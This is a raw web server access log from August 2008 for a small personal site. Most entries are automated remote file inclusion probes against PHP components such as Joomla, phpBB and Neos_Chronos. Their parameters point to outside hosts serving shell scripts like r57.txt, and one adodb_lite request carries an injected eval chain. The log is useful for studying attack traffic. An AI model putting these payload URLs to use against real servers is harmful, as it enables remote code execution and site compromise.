77.74.198.93 - - [28/Aug/2008:11:08:18 -0700] "GET /logs/access_080405.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:32 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:33 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:33 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:33 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:33 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:34 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:34 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:37 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:37 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:08:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0102.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:09:13 -0700] "GET /logs/access_080313.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:09:15 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:09:16 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:09:16 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:09:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:09:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:09:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:09:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.238.205.69 - - [28/Aug/2008:11:09:53 -0700] "GET /logs/access_080507.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scc.bestcominfo.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:11:10:03 -0700] "GET /logs/access_080621.log/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:11:12 -0700] "GET /logs/access_080427.log/index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:11:14 -0700] "GET /index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 200 85183 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:11:25 -0700] "GET /logs/access_080124.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:11:25 -0700] "GET /logs/access_080124.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:11:25 -0700] "GET /logs/access_080124.log//cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:11:28 -0700] "GET /logs/access_080124.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:11:40 -0700] "GET /logs/errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:11:40 -0700] "GET /errors.php?error=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:11:56 -0700] "GET /logs/access_080722.log/atom.php5?page=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:12:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:12:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:12:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.139.163.236 - - [28/Aug/2008:11:12:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:12:23 -0700] "GET /logs/access_080806.log/atom.php5?page=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:12:38 -0700] "GET /bikes/dteel/2008_02_15/?S=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:12:43 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:12:43 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:12:53 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:13:00 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85015 "-" "libwww-perl/5.65" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:18 -0700] "GET /logs/access_080127.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:19 -0700] "GET /logs///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:19 -0700] "GET ///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:23 -0700] "GET /logs/access_080127.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:23 -0700] "GET ///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:24 -0700] "GET /logs///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:32 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:32 -0700] "GET //Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:32 -0700] "GET /logs/access_080127.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:32 -0700] "GET ///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:32 -0700] "GET /logs///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:33 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:37 -0700] "GET /logs/access_080131.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:13:40 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:13:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:13:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:41 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:41 -0700] "GET //Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:13:42 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.184 - - [28/Aug/2008:11:13:42 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://canabis4t1v4.com.br/xpl/osirys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:13:43 -0700] "GET /logs/access_080131.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:13:46 -0700] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:13:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:13:49 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.177.28.235 - - [28/Aug/2008:11:13:49 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:13:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:13:55 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:13:56 -0700] "GET //Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:13:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:13:59 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:00 -0700] "GET /logs/access_080706.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:01 -0700] "GET /logs/access_080131.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:03 -0700] "GET /logs/access_080505.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.133.193.34 - - [28/Aug/2008:11:14:06 -0700] "GET /logs/access_080804.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:12 -0700] "GET /logs/access_080505.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:13 -0700] "GET /logs/access_080706.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:14:18 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0010.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:22 -0700] "GET /logs/access_080706.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [28/Aug/2008:11:14:23 -0700] "GET /logs/access_080505.log///php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.freewebs.com/lostmind7/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:15:09 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=7&order=FileNum&order_type=ASC HTTP/1.1" 200 33111 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=7&order=Borrowers&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:15:13 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32964 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=7&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:11:15:25 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:15:30 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 200 85467 "-" "libwww-perl/5.812" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:11:15:36 -0700] "GET /logs/access_080606.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:15:36 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33112 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:11:15:38 -0700] "GET /logs/access_080710.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:15:41 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32964 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:15:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0033.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:15:43 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33112 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:11:15:54 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:16:28 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32884 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:16:34 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
59.106.54.82 - - [28/Aug/2008:11:16:37 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:16:41 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 32894 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:16:43 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32884 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:11:16:55 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 32894 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:16:58 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:16:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:16:59 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:11:17:00 -0700] "GET /logs/access_080710.log//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:11:17:01 -0700] "GET /logs/index3.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:11:17:01 -0700] "GET /logs/access_080224.log/index3.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:17:02 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [28/Aug/2008:11:17:02 -0700] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 200 85435 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [28/Aug/2008:11:17:03 -0700] "GET /index3.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
